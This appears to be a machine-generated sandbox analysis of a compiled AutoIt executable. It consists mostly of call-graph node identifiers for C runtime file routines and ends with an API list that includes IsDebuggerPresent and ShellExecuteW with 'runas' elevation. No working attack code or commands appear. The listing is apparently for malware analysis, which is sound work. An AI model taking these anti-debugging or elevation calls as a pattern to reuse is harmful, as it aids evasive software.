97765->97966 97768 c84d08 97772 c84dd0 97768->97772 97769 c84cff FreeLibrary 97769->97768 97770 c84d94 2 API calls 97771 c84ced 97770->97771 97771->97768 97771->97769 97773 ca0ff6 Mailbox 59 API calls 97772->97773 97774 c84de5 97773->97774 97775 c8538e 59 API calls 97774->97775 97776 c84df1 _memmove 97775->97776 97777 c84e2c 97776->97777 97779 
c84ee9 97776->97779 97780 c84f21 97776->97780 97778 c85027 69 API calls 97777->97778 97787 c84e35 97778->97787 97970 c84fe9 CreateStreamOnHGlobal 97779->97970 97981 ce9ba5 95 API calls 97780->97981 97783 c8506b 74 API calls 97783->97787 97785 c84ec9 97785->97654 97786 cbdcd0 97788 c85045 85 API calls 97786->97788 97787->97783 97787->97785 97787->97786 97976 c85045 97787->97976 97789 cbdce4 97788->97789 97790 c8506b 74 API calls 97789->97790 97790->97785 97792 c8507d 97791->97792 97793 cbddf6 97791->97793 98005 ca5812 97792->98005 97796 ce9393 98203 ce91e9 97796->98203 97798 ce93a9 97798->97661 97800 cbddb9 97799->97800 97801 c85036 97799->97801 98208 ca5e90 97801->98208 97803 c8503e 97803->97663 97805 c84d2e 97804->97805 97806 c84d6a LoadLibraryA 97804->97806 97805->97758 97805->97761 97806->97805 97807 c84d7b GetProcAddress 97806->97807 97807->97805 97811 ca54ac ___lock_fhandle 97808->97811 97809 ca54bf 97857 ca8d68 58 API calls __getptd_noexit 97809->97857 97811->97809 97813 ca54f0 97811->97813 97812 ca54c4 97858 ca8ff6 9 API calls __wcsicmp_l 97812->97858 97827 cb0738 97813->97827 97816 ca54f5 97817 ca550b 97816->97817 97818 ca54fe 97816->97818 97820 ca5535 97817->97820 97821 ca5515 97817->97821 97859 ca8d68 58 API calls __getptd_noexit 97818->97859 97842 cb0857 97820->97842 97860 ca8d68 58 API calls __getptd_noexit 97821->97860 97823 ca54cf ___lock_fhandle @_EH4_CallFilterFunc@8 97823->97764 97828 cb0744 ___lock_fhandle 97827->97828 97829 ca9e4b __lock 58 API calls 97828->97829 97830 cb0752 97829->97830 97831 cb07cd 97830->97831 97837 ca9ed3 __mtinitlocknum 58 API calls 97830->97837 97840 cb07c6 97830->97840 97865 ca6e8d 59 API calls __lock 97830->97865 97866 ca6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 97830->97866 97867 ca8a5d 58 API calls 2 library calls 97831->97867 97834 cb0843 ___lock_fhandle 97834->97816 97835 cb07d4 97835->97840 97868 caa06b InitializeCriticalSectionAndSpinCount 97835->97868 97837->97830 97839 cb07fa EnterCriticalSection 
97839->97840 97862 cb084e 97840->97862 97850 cb0877 __wopenfile 97842->97850 97843 cb0891 97873 ca8d68 58 API calls __getptd_noexit 97843->97873 97845 cb0896 97874 ca8ff6 9 API calls __wcsicmp_l 97845->97874 97847 cb0aaf 97870 cb87f1 97847->97870 97848 ca5540 97861 ca5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 97848->97861 97850->97843 97856 cb0a4c 97850->97856 97875 ca3a0b 60 API calls 2 library calls 97850->97875 97852 cb0a45 97852->97856 97876 ca3a0b 60 API calls 2 library calls 97852->97876 97854 cb0a64 97854->97856 97877 ca3a0b 60 API calls 2 library calls 97854->97877 97856->97843 97856->97847 97857->97812 97858->97823 97859->97823 97860->97823 97861->97823 97869 ca9fb5 LeaveCriticalSection 97862->97869 97864 cb0855 97864->97834 97865->97830 97866->97830 97867->97835 97868->97839 97869->97864 97878 cb7fd5 97870->97878 97872 cb880a 97872->97848 97873->97845 97874->97848 97875->97852 97876->97854 97877->97856 97879 cb7fe1 ___lock_fhandle 97878->97879 97880 cb7ff7 97879->97880 97883 cb802d 97879->97883 97963 ca8d68 58 API calls __getptd_noexit 97880->97963 97882 cb7ffc 97964 ca8ff6 9 API calls __wcsicmp_l 97882->97964 97889 cb809e 97883->97889 97886 cb8006 ___lock_fhandle 97886->97872 97887 cb8049 97965 cb8072 LeaveCriticalSection __unlock_fhandle 97887->97965 97890 cb80be 97889->97890 97891 ca471a __wsopen_nolock 58 API calls 97890->97891 97894 cb80da 97891->97894 97892 ca9006 __invoke_watson 8 API calls 97893 cb87f0 97892->97893 97895 cb7fd5 __wsopen_helper 103 API calls 97893->97895 97896 cb8114 97894->97896 97902 cb8137 97894->97902 97962 cb8211 97894->97962 97897 cb880a 97895->97897 97898 ca8d34 __write 58 API calls 97896->97898 97897->97887 97899 cb8119 97898->97899 97900 ca8d68 __wcsicmp_l 58 API calls 97899->97900 97901 cb8126 97900->97901 97903 ca8ff6 __wcsicmp_l 9 API calls 97901->97903 97904 cb81f5 97902->97904 97911 cb81d3 97902->97911 97905 cb8130 97903->97905 97906 ca8d34 __write 58 API calls 97904->97906 97905->97887 97907 cb81fa 
97906->97907 97908 ca8d68 __wcsicmp_l 58 API calls 97907->97908 97909 cb8207 97908->97909 97910 ca8ff6 __wcsicmp_l 9 API calls 97909->97910 97910->97962 97912 cad4d4 __alloc_osfhnd 61 API calls 97911->97912 97913 cb82a1 97912->97913 97914 cb82ab 97913->97914 97915 cb82ce 97913->97915 97917 ca8d34 __write 58 API calls 97914->97917 97916 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97915->97916 97927 cb82f0 97916->97927 97918 cb82b0 97917->97918 97920 ca8d68 __wcsicmp_l 58 API calls 97918->97920 97919 cb836e GetFileType 97921 cb83bb 97919->97921 97922 cb8379 GetLastError 97919->97922 97924 cb82ba 97920->97924 97934 cad76a __set_osfhnd 59 API calls 97921->97934 97926 ca8d47 __dosmaperr 58 API calls 97922->97926 97923 cb833c GetLastError 97928 ca8d47 __dosmaperr 58 API calls 97923->97928 97925 ca8d68 __wcsicmp_l 58 API calls 97924->97925 97925->97905 97929 cb83a0 CloseHandle 97926->97929 97927->97919 97927->97923 97930 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97927->97930 97931 cb8361 97928->97931 97929->97931 97932 cb83ae 97929->97932 97933 cb8331 97930->97933 97936 ca8d68 __wcsicmp_l 58 API calls 97931->97936 97935 ca8d68 __wcsicmp_l 58 API calls 97932->97935 97933->97919 97933->97923 97938 cb83d9 97934->97938 97937 cb83b3 97935->97937 97936->97962 97937->97931 97939 cb8594 97938->97939 97940 cb1b11 __lseeki64_nolock 60 API calls 97938->97940 97959 cb845a 97938->97959 97941 cb8767 CloseHandle 97939->97941 97939->97962 97943 cb8443 97940->97943 97942 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97941->97942 97944 cb878e 97942->97944 97945 ca8d34 __write 58 API calls 97943->97945 97943->97959 97946 cb87c2 97944->97946 97947 cb8796 GetLastError 97944->97947 97945->97959 97946->97962 97948 ca8d47 __dosmaperr 58 API calls 97947->97948 97950 cb87a2 97948->97950 97949 cb1b11 60 API calls __lseeki64_nolock 97949->97959 97955 cad67d __free_osfhnd 59 API calls 97950->97955 97951 cb0d2d __close_nolock 61 API calls 
97951->97959 97952 cb10ab 70 API calls __read_nolock 97952->97959 97953 cb848c 97954 cb99f2 __chsize_nolock 82 API calls 97953->97954 97953->97959 97954->97953 97955->97946 97956 cadac6 __write 78 API calls 97956->97959 97957 cb8611 97958 cb0d2d __close_nolock 61 API calls 97957->97958 97960 cb8618 97958->97960 97959->97939 97959->97949 97959->97951 97959->97952 97959->97953 97959->97956 97959->97957 97961 ca8d68 __wcsicmp_l 58 API calls 97960->97961 97961->97962 97962->97892 97963->97882 97964->97886 97965->97886 97967 c84ce1 97966->97967 97968 c84d9d LoadLibraryA 97966->97968 97967->97770 97967->97771 97968->97967 97969 c84dae GetProcAddress 97968->97969 97969->97967 97971 c85003 FindResourceExW 97970->97971 97975 c85020 97970->97975 97972 cbdd5c LoadResource 97971->97972 97971->97975 97973 cbdd71 SizeofResource 97972->97973 97972->97975 97974 cbdd85 LockResource 97973->97974 97973->97975 97974->97975 97975->97777 97977 c85054 97976->97977 97978 cbddd4 97976->97978 97982 ca5a7d 97977->97982 97980 c85062 97980->97787 97981->97777 97983 ca5a89 ___lock_fhandle 97982->97983 97984 ca5a9b 97983->97984 97986 ca5ac1 97983->97986 97995 ca8d68 58 API calls __getptd_noexit 97984->97995 97997 ca6e4e 97986->97997 97988 ca5aa0 97996 ca8ff6 9 API calls __wcsicmp_l 97988->97996 97989 ca5ac7 98003 ca59ee 83 API calls 5 library calls 97989->98003 97992 ca5ad6 98004 ca5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 97992->98004 97994 ca5aab ___lock_fhandle 97994->97980 97995->97988 97996->97994 97998 ca6e5e 97997->97998 97999 ca6e80 EnterCriticalSection 97997->97999 97998->97999 98000 ca6e66 97998->98000 98001 ca6e76 97999->98001 98002 ca9e4b __lock 58 API calls 98000->98002 98001->97989 98002->98001 98003->97992 98004->97994 98008 ca582d 98005->98008 98007 c8508e 98007->97796 98009 ca5839 ___lock_fhandle 98008->98009 98010 ca584f _memset 98009->98010 98011 ca587c 98009->98011 98012 ca5874 ___lock_fhandle 98009->98012 98035 ca8d68 58 API calls __getptd_noexit 98010->98035 
98013 ca6e4e __lock_file 59 API calls 98011->98013 98012->98007 98014 ca5882 98013->98014 98021 ca564d 98014->98021 98017 ca5869 98036 ca8ff6 9 API calls __wcsicmp_l 98017->98036 98024 ca5668 _memset 98021->98024 98027 ca5683 98021->98027 98022 ca5673 98133 ca8d68 58 API calls __getptd_noexit 98022->98133 98024->98022 98024->98027 98032 ca56c3 98024->98032 98025 ca5678 98134 ca8ff6 9 API calls __wcsicmp_l 98025->98134 98037 ca58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98027->98037 98029 ca57d4 _memset 98136 ca8d68 58 API calls __getptd_noexit 98029->98136 98032->98027 98032->98029 98038 ca4916 98032->98038 98045 cb10ab 98032->98045 98113 cb0df7 98032->98113 98135 cb0f18 58 API calls 3 library calls 98032->98135 98035->98017 98036->98012 98037->98012 98039 ca4920 98038->98039 98040 ca4935 98038->98040 98137 ca8d68 58 API calls __getptd_noexit 98039->98137 98040->98032 98042 ca4925 98138 ca8ff6 9 API calls __wcsicmp_l 98042->98138 98044 ca4930 98044->98032 98046 cb10cc 98045->98046 98047 cb10e3 98045->98047 98148 ca8d34 58 API calls __getptd_noexit 98046->98148 98049 cb181b 98047->98049 98054 cb111d 98047->98054 98164 ca8d34 58 API calls __getptd_noexit 98049->98164 98051 cb10d1 98149 ca8d68 58 API calls __getptd_noexit 98051->98149 98052 cb1820 98165 ca8d68 58 API calls __getptd_noexit 98052->98165 98056 cb1125 98054->98056 98062 cb113c 98054->98062 98150 ca8d34 58 API calls __getptd_noexit 98056->98150 98057 cb1131 98166 ca8ff6 9 API calls __wcsicmp_l 98057->98166 98058 cb10d8 98058->98032 98060 cb112a 98151 ca8d68 58 API calls __getptd_noexit 98060->98151 98062->98058 98063 cb1151 98062->98063 98066 cb116b 98062->98066 98067 cb1189 98062->98067 98152 ca8d34 58 API calls __getptd_noexit 98063->98152 98066->98063 98068 cb1176 98066->98068 98153 ca8a5d 58 API calls 2 library calls 98067->98153 98139 cb5ebb 98068->98139 98070 cb1199 98072 cb11bc 98070->98072 98073 cb11a1 98070->98073 98156 cb1b11 60 API calls 3 library calls 98072->98156 98154 ca8d68 58 
API calls __getptd_noexit 98073->98154 98074 cb128a 98076 cb1303 ReadFile 98074->98076 98081 cb12a0 GetConsoleMode 98074->98081 98079 cb17e3 GetLastError 98076->98079 98080 cb1325 98076->98080 98078 cb11a6 98155 ca8d34 58 API calls __getptd_noexit 98078->98155 98083 cb17f0 98079->98083 98089 cb12e3 98079->98089 98080->98079 98087 cb12f5 98080->98087 98084 cb1300 98081->98084 98085 cb12b4 98081->98085 98162 ca8d68 58 API calls __getptd_noexit 98083->98162 98084->98076 98085->98084 98088 cb12ba ReadConsoleW 98085->98088 98095 cb15c7 98087->98095 98096 cb12e9 98087->98096 98098 cb135a 98087->98098 98088->98087 98092 cb12dd GetLastError 98088->98092 98089->98096 98157 ca8d47 58 API calls 3 library calls 98089->98157 98091 cb17f5 98163 ca8d34 58 API calls __getptd_noexit 98091->98163 98092->98089 98094 ca2f95 _free 58 API calls 98094->98058 98095->98096 98103 cb16cd ReadFile 98095->98103 98096->98058 98096->98094 98099 cb13c6 ReadFile 98098->98099 98105 cb1447 98098->98105 98100 cb13e7 GetLastError 98099->98100 98109 cb13f1 98099->98109 98100->98109 98101 cb1504 98107 cb14b4 MultiByteToWideChar 98101->98107 98160 cb1b11 60 API calls 3 library calls 98101->98160 98102 cb14f4 98159 ca8d68 58 API calls __getptd_noexit 98102->98159 98104 cb16f0 GetLastError 98103->98104 98112 cb16fe 98103->98112 98104->98112 98105->98096 98105->98101 98105->98102 98105->98107 98107->98092 98107->98096 98109->98098 98158 cb1b11 60 API calls 3 library calls 98109->98158 98112->98095 98161 cb1b11 60 API calls 3 library calls 98112->98161 98114 cb0e02 98113->98114 98118 cb0e17 98113->98118 98200 ca8d68 58 API calls __getptd_noexit 98114->98200 98116 cb0e12 98116->98032 98117 cb0e07 98201 ca8ff6 9 API calls __wcsicmp_l 98117->98201 98118->98116 98120 cb0e4c 98118->98120 98202 cb6234 58 API calls __malloc_crt 98118->98202 98122 ca4916 __stbuf 58 API calls 98120->98122 98123 cb0e60 98122->98123 98167 cb0f97 98123->98167 98125 cb0e67 98125->98116 98126 ca4916 __stbuf 58 API calls 98125->98126 98127 
cb0e8a 98126->98127 98127->98116 98128 ca4916 __stbuf 58 API calls 98127->98128 98129 cb0e96 98128->98129 98129->98116 98130 ca4916 __stbuf 58 API calls 98129->98130 98131 cb0ea3 98130->98131 98132 ca4916 __stbuf 58 API calls 98131->98132 98132->98116 98133->98025 98134->98027 98135->98032 98136->98025 98137->98042 98138->98044 98140 cb5ec6 98139->98140 98142 cb5ed3 98139->98142 98141 ca8d68 __wcsicmp_l 58 API calls 98140->98141 98143 cb5ecb 98141->98143 98144 cb5edf 98142->98144 98145 ca8d68 __wcsicmp_l 58 API calls 98142->98145 98143->98074 98144->98074 98146 cb5f00 98145->98146 98147 ca8ff6 __wcsicmp_l 9 API calls 98146->98147 98147->98143 98148->98051 98149->98058 98150->98060 98151->98057 98152->98060 98153->98070 98154->98078 98155->98058 98156->98068 98157->98096 98158->98109 98159->98096 98160->98107 98161->98112 98162->98091 98163->98096 98164->98052 98165->98057 98166->98058 98168 cb0fa3 ___lock_fhandle 98167->98168 98169 cb0fb0 98168->98169 98170 cb0fc7 98168->98170 98172 ca8d34 __write 58 API calls 98169->98172 98171 cb108b 98170->98171 98173 cb0fdb 98170->98173 98174 ca8d34 __write 58 API calls 98171->98174 98175 cb0fb5 98172->98175 98177 cb0ff9 98173->98177 98178 cb1006 98173->98178 98182 cb0ffe 98174->98182 98176 ca8d68 __wcsicmp_l 58 API calls 98175->98176 98195 cb0fbc ___lock_fhandle 98176->98195 98179 ca8d34 __write 58 API calls 98177->98179 98180 cb1028 98178->98180 98181 cb1013 98178->98181 98179->98182 98185 cad446 ___lock_fhandle 59 API calls 98180->98185 98184 ca8d34 __write 58 API calls 98181->98184 98183 ca8d68 __wcsicmp_l 58 API calls 98182->98183 98187 cb1020 98183->98187 98188 cb1018 98184->98188 98186 cb102e 98185->98186 98189 cb1041 98186->98189 98190 cb1054 98186->98190 98193 ca8ff6 __wcsicmp_l 9 API calls 98187->98193 98191 ca8d68 __wcsicmp_l 58 API calls 98188->98191 98192 cb10ab __read_nolock 70 API calls 98189->98192 98194 ca8d68 __wcsicmp_l 58 API calls 98190->98194 98191->98187 98196 cb104d 98192->98196 98193->98195 98197 cb1059 
98194->98197 98195->98125 98199 cb1083 __read LeaveCriticalSection 98196->98199 98198 ca8d34 __write 58 API calls 98197->98198 98198->98196 98199->98195 98200->98117 98201->98116 98202->98120 98206 ca543a GetSystemTimeAsFileTime 98203->98206 98205 ce91f8 98205->97798 98207 ca5468 __aulldiv 98206->98207 98207->98205 98209 ca5e9c ___lock_fhandle 98208->98209 98210 ca5eae 98209->98210 98211 ca5ec3 98209->98211 98222 ca8d68 58 API calls __getptd_noexit 98210->98222 98213 ca6e4e __lock_file 59 API calls 98211->98213 98215 ca5ec9 98213->98215 98214 ca5eb3 98223 ca8ff6 9 API calls __wcsicmp_l 98214->98223 98224 ca5b00 67 API calls 6 library calls 98215->98224 98218 ca5ed4 98225 ca5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98218->98225 98219 ca5ebe ___lock_fhandle 98219->97803 98221 ca5ee6 98221->98219 98222->98214 98223->98219 98224->98218 98225->98221 98226->97665 98227->97674 98228->97687 98229->97689 98230->97686 98231->97695 98233 c892c9 Mailbox 98232->98233 98234 cbf5c8 98233->98234 98239 c892d3 98233->98239 98235 ca0ff6 Mailbox 59 API calls 98234->98235 98237 cbf5d4 98235->98237 98236 c892da 98236->97699 98239->98236 98240 c89df0 59 API calls Mailbox 98239->98240 98240->98239 98241->97709 98242->97710 98246 ce99d2 __tzset_nolock _wcscmp 98243->98246 98244 ce9393 GetSystemTimeAsFileTime 98244->98246 98245 c8506b 74 API calls 98245->98246 98246->98244 98246->98245 98247 ce9866 98246->98247 98248 c85045 85 API calls 98246->98248 98247->97716 98247->97743 98248->98246 98250 ce8da9 98249->98250 98251 ce8d9b 98249->98251 98253 ce8dee 98250->98253 98254 ca548b 115 API calls 98250->98254 98264 ce8db2 98250->98264 98252 ca548b 115 API calls 98251->98252 98252->98250 98280 ce901b 98253->98280 98256 ce8dd3 98254->98256 98256->98253 98257 ce8ddc 98256->98257 98261 ca55d6 __fcloseall 83 API calls 98257->98261 98257->98264 98258 ce8e32 98259 ce8e36 98258->98259 98260 ce8e57 98258->98260 98263 ce8e43 98259->98263 98266 ca55d6 __fcloseall 83 API calls 98259->98266 
98284 ce8c33 98260->98284 98261->98264 98263->98264 98269 ca55d6 __fcloseall 83 API calls 98263->98269 98264->97745 98266->98263 98267 ce8e85 98293 ce8eb5 98267->98293 98268 ce8e65 98272 ca55d6 __fcloseall 83 API calls 98268->98272 98274 ce8e72 98268->98274 98269->98264 98272->98274 98274->98264 98275 ca55d6 __fcloseall 83 API calls 98274->98275 98275->98264 98277 ce8ea0 98277->98264 98279 ca55d6 __fcloseall 83 API calls 98277->98279 98279->98264 98281 ce9040 98280->98281 98283 ce9029 __tzset_nolock _memmove 98280->98283 98282 ca5812 __fread_nolock 74 API calls 98281->98282 98282->98283 98283->98258 98285 ca594c _W_store_winword 58 API calls 98284->98285 98286 ce8c42 98285->98286 98287 ca594c _W_store_winword 58 API calls 98286->98287 98288 ce8c56 98287->98288 98289 ca594c _W_store_winword 58 API calls 98288->98289 98290 ce8c6a 98289->98290 98291 ce8f97 58 API calls 98290->98291 98292 ce8c7d 98290->98292 98291->98292 98292->98267 98292->98268 98300 ce8eca 98293->98300 98294 ce8f82 98326 ce91bf 98294->98326 98295 ce8c8f 74 API calls 98295->98300 98297 ce8e8c 98301 ce8f97 98297->98301 98300->98294 98300->98295 98300->98297 98322 ce909c 98300->98322 98330 ce8d2b 74 API calls 98300->98330 98302 ce8faa 98301->98302 98303 ce8fa4 98301->98303 98305 ce8fbb 98302->98305 98306 ca2f95 _free 58 API calls 98302->98306 98304 ca2f95 _free 58 API calls 98303->98304 98304->98302 98307 ca2f95 _free 58 API calls 98305->98307 98308 ce8e93 98305->98308 98306->98305 98307->98308 98308->98277 98309 ca55d6 98308->98309 98310 ca55e2 ___lock_fhandle 98309->98310 98311 ca560e 98310->98311 98312 ca55f6 98310->98312 98315 ca5606 ___lock_fhandle 98311->98315 98316 ca6e4e __lock_file 59 API calls 98311->98316 98379 ca8d68 58 API calls __getptd_noexit 98312->98379 98314 ca55fb 98380 ca8ff6 9 API calls __wcsicmp_l 98314->98380 98315->98277 98318 ca5620 98316->98318 98363 ca556a 98318->98363 98324 ce90ab 98322->98324 98325 ce90eb 98322->98325 98324->98300 98325->98324 98331 ce9172 98325->98331 
98327 ce91cc 98326->98327 98328 ce91dd 98326->98328 98329 ca4a93 80 API calls 98327->98329 98328->98297 98329->98328 98330->98300 98332 ce919e 98331->98332 98333 ce91af 98331->98333 98335 ca4a93 98332->98335 98333->98325 98336 ca4a9f ___lock_fhandle 98335->98336 98337 ca4abd 98336->98337 98338 ca4ad5 98336->98338 98347 ca4acd ___lock_fhandle 98336->98347 98360 ca8d68 58 API calls __getptd_noexit 98337->98360 98339 ca6e4e __lock_file 59 API calls 98338->98339 98341 ca4adb 98339->98341 98348 ca493a 98341->98348 98342 ca4ac2 98361 ca8ff6 9 API calls __wcsicmp_l 98342->98361 98347->98333 98351 ca4949 98348->98351 98354 ca4967 98348->98354 98349 ca4957 98350 ca8d68 __wcsicmp_l 58 API calls 98349->98350 98352 ca495c 98350->98352 98351->98349 98351->98354 98357 ca4981 _memmove 98351->98357 98353 ca8ff6 __wcsicmp_l 9 API calls 98352->98353 98353->98354 98362 ca4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 98354->98362 98355 cab05e __flsbuf 78 API calls 98355->98357 98356 ca4c6d __flush 78 API calls 98356->98357 98357->98354 98357->98355 98357->98356 98358 ca4916 __stbuf 58 API calls 98357->98358 98359 cadac6 __write 78 API calls 98357->98359 98358->98357 98359->98357 98360->98342 98361->98347 98362->98347 98364 ca5579 98363->98364 98365 ca558d 98363->98365 98418 ca8d68 58 API calls __getptd_noexit 98364->98418 98371 ca5589 98365->98371 98382 ca4c6d 98365->98382 98367 ca557e 98419 ca8ff6 9 API calls __wcsicmp_l 98367->98419 98381 ca5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 98371->98381 98374 ca4916 __stbuf 58 API calls 98375 ca55a7 98374->98375 98392 cb0c52 98375->98392 98377 ca55ad 98377->98371 98378 ca2f95 _free 58 API calls 98377->98378 98378->98371 98379->98314 98380->98315 98381->98315 98383 ca4c80 98382->98383 98387 ca4ca4 98382->98387 98384 ca4916 __stbuf 58 API calls 98383->98384 98383->98387 98385 ca4c9d 98384->98385 98420 cadac6 98385->98420 98388 cb0dc7 98387->98388 98389 ca55a1 98388->98389 98390 cb0dd4 98388->98390 98389->98374 
98390->98389 98391 ca2f95 _free 58 API calls 98390->98391 98391->98389 98393 cb0c5e ___lock_fhandle 98392->98393 98394 cb0c6b 98393->98394 98395 cb0c82 98393->98395 98545 ca8d34 58 API calls __getptd_noexit 98394->98545 98396 cb0d0d 98395->98396 98398 cb0c92 98395->98398 98550 ca8d34 58 API calls __getptd_noexit 98396->98550 98401 cb0cba 98398->98401 98402 cb0cb0 98398->98402 98400 cb0c70 98546 ca8d68 58 API calls __getptd_noexit 98400->98546 98406 cad446 ___lock_fhandle 59 API calls 98401->98406 98547 ca8d34 58 API calls __getptd_noexit 98402->98547 98403 cb0cb5 98551 ca8d68 58 API calls __getptd_noexit 98403->98551 98408 cb0cc0 98406->98408 98410 cb0cde 98408->98410 98411 cb0cd3 98408->98411 98409 cb0d19 98552 ca8ff6 9 API calls __wcsicmp_l 98409->98552 98548 ca8d68 58 API calls __getptd_noexit 98410->98548 98530 cb0d2d 98411->98530 98414 cb0c77 ___lock_fhandle 98414->98377 98416 cb0cd9 98549 cb0d05 LeaveCriticalSection __unlock_fhandle 98416->98549 98418->98367 98419->98371 98421 cadad2 ___lock_fhandle 98420->98421 98422 cadadf 98421->98422 98423 cadaf6 98421->98423 98521 ca8d34 58 API calls __getptd_noexit 98422->98521 98425 cadb95 98423->98425 98427 cadb0a 98423->98427 98527 ca8d34 58 API calls __getptd_noexit 98425->98527 98426 cadae4 98522 ca8d68 58 API calls __getptd_noexit 98426->98522 98430 cadb28 98427->98430 98431 cadb32 98427->98431 98523 ca8d34 58 API calls __getptd_noexit 98430->98523 98448 cad446 98431->98448 98432 cadb2d 98528 ca8d68 58 API calls __getptd_noexit 98432->98528 98435 cadb38 98437 cadb4b 98435->98437 98438 cadb5e 98435->98438 98457 cadbb5 98437->98457 98524 ca8d68 58 API calls __getptd_noexit 98438->98524 98439 cadba1 98529 ca8ff6 9 API calls __wcsicmp_l 98439->98529 98440 cadaeb ___lock_fhandle 98440->98387 98444 cadb57 98526 cadb8d LeaveCriticalSection __unlock_fhandle 98444->98526 98445 cadb63 98525 ca8d34 58 API calls __getptd_noexit 98445->98525 98449 cad452 ___lock_fhandle 98448->98449 98450 cad4a1 EnterCriticalSection 
98449->98450 98451 ca9e4b __lock 58 API calls 98449->98451 98452 cad4c7 ___lock_fhandle 98450->98452 98453 cad477 98451->98453 98452->98435 98454 cad48f 98453->98454 98455 caa06b ___lock_fhandle InitializeCriticalSectionAndSpinCount 98453->98455 98456 cad4cb ___lock_fhandle LeaveCriticalSection 98454->98456 98455->98454 98456->98450 98458 cadbc2 __write_nolock 98457->98458 98459 cadbf6 98458->98459 98460 cadc20 98458->98460 98461 cadc01 98458->98461 98462 cac836 setSBUpLow 6 API calls 98459->98462 98464 cadc78 98460->98464 98465 cadc5c 98460->98465 98463 ca8d34 __write 58 API calls 98461->98463 98466 cae416 98462->98466 98467 cadc06 98463->98467 98469 cadc91 98464->98469 98473 cb1b11 __lseeki64_nolock 60 API calls 98464->98473 98468 ca8d34 __write 58 API calls 98465->98468 98466->98444 98470 ca8d68 __wcsicmp_l 58 API calls 98467->98470 98472 cadc61 98468->98472 98471 cb5ebb __stbuf 58 API calls 98469->98471 98474 cadc0d 98470->98474 98475 cadc9f 98471->98475 98476 ca8d68 __wcsicmp_l 58 API calls 98472->98476 98473->98469 98477 ca8ff6 __wcsicmp_l 9 API calls 98474->98477 98478 cadff8 98475->98478 98483 ca9bec __setmbcp 58 API calls 98475->98483 98479 cadc68 98476->98479 98477->98459 98480 cae38b WriteFile 98478->98480 98481 cae016 98478->98481 98482 ca8ff6 __wcsicmp_l 9 API calls 98479->98482 98484 cadfeb GetLastError 98480->98484 98490 cadfb8 98480->98490 98485 cae13a 98481->98485 98493 cae02c 98481->98493 98482->98459 98486 cadccb GetConsoleMode 98483->98486 98484->98490 98496 cae22f 98485->98496 98499 cae145 98485->98499 98486->98478 98488 cadd0a 98486->98488 98487 cae3c4 98487->98459 98489 ca8d68 __wcsicmp_l 58 API calls 98487->98489 98488->98478 98491 cadd1a GetConsoleCP 98488->98491 98494 cae3f2 98489->98494 98490->98459 98490->98487 98495 cae118 98490->98495 98491->98487 98497 cadd49 98491->98497 98492 cae09b WriteFile 98492->98484 98498 cae0d8 98492->98498 98493->98487 98493->98492 98500 ca8d34 __write 58 API calls 98494->98500 98501 cae3bb 98495->98501 
98502 cae123 98495->98502 98496->98487 98503 cae2a4 WideCharToMultiByte 98496->98503 98497->98490 98513 ca3835 __write_nolock 58 API calls 98497->98513 98515 cb650a 60 API calls __write_nolock 98497->98515 98516 cade32 WideCharToMultiByte 98497->98516 98519 cade9f 98497->98519 98498->98493 98514 cae0fc 98498->98514 98499->98487 98504 cae1aa WriteFile 98499->98504 98500->98459 98507 ca8d47 __dosmaperr 58 API calls 98501->98507 98506 ca8d68 __wcsicmp_l 58 API calls 98502->98506 98503->98484 98508 cae2eb 98503->98508 98504->98484 98505 cae1f9 98504->98505 98505->98490 98505->98499 98505->98514 98509 cae128 98506->98509 98507->98459 98508->98490 98508->98496 98510 cae2f3 WriteFile 98508->98510 98508->98514 98512 ca8d34 __write 58 API calls 98509->98512 98510->98508 98511 cae346 GetLastError 98510->98511 98511->98508 98512->98459 98513->98497 98514->98490 98515->98497 98516->98490 98517 cade6d WriteFile 98516->98517 98517->98484 98517->98519 98518 cb7cae WriteConsoleW CreateFileW __putwch_nolock 98518->98519 98519->98484 98519->98490 98519->98497 98519->98518 98520 cadec7 WriteFile 98519->98520 98520->98484 98520->98519 98521->98426 98522->98440 98523->98432 98524->98445 98525->98444 98526->98440 98527->98432 98528->98439 98529->98440 98553 cad703 98530->98553 98532 cb0d91 98566 cad67d 59 API calls 2 library calls 98532->98566 98534 cb0d3b 98534->98532 98535 cb0d6f 98534->98535 98538 cad703 __close_nolock 58 API calls 98534->98538 98535->98532 98536 cad703 __close_nolock 58 API calls 98535->98536 98539 cb0d7b FindCloseChangeNotification 98536->98539 98537 cb0d99 98540 cb0dbb 98537->98540 98567 ca8d47 58 API calls 3 library calls 98537->98567 98541 cb0d66 98538->98541 98539->98532 98542 cb0d87 GetLastError 98539->98542 98540->98416 98544 cad703 __close_nolock 58 API calls 98541->98544 98542->98532 98544->98535 98545->98400 98546->98414 98547->98403 98548->98416 98549->98414 98550->98403 98551->98409 98552->98414 98554 cad70e 98553->98554 98555 cad723 98553->98555 98556 
            (call graph node/edge data from the interactive graph viewer omitted)

            Control-flow Graph

            APIs
            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C83B7A
            • IsDebuggerPresent.KERNEL32 ref: 00C83B8C
            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D462F8,00D462E0,?,?), ref: 00C83BFD
              • Part of subcall function 00C87D2C: _memmove.LIBCMT ref: 00C87D66
              • Part of subcall function 00C90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C83C26,00D462F8,?,?,?), ref: 00C90ACE
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C83C81
            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D393F0,00000010), ref: 00CBD4BC
            • SetCurrentDirectoryW.KERNEL32(?,00D462F8,?,?,?), ref: 00CBD4F4
            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D35D40,00D462F8,?,?,?), ref: 00CBD57A
            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00CBD581
              • Part of subcall function 00C83A58: GetSysColorBrush.USER32(0000000F), ref: 00C83A62
              • Part of subcall function 00C83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00C83A71
              • Part of subcall function 00C83A58: LoadIconW.USER32(00000063), ref: 00C83A88
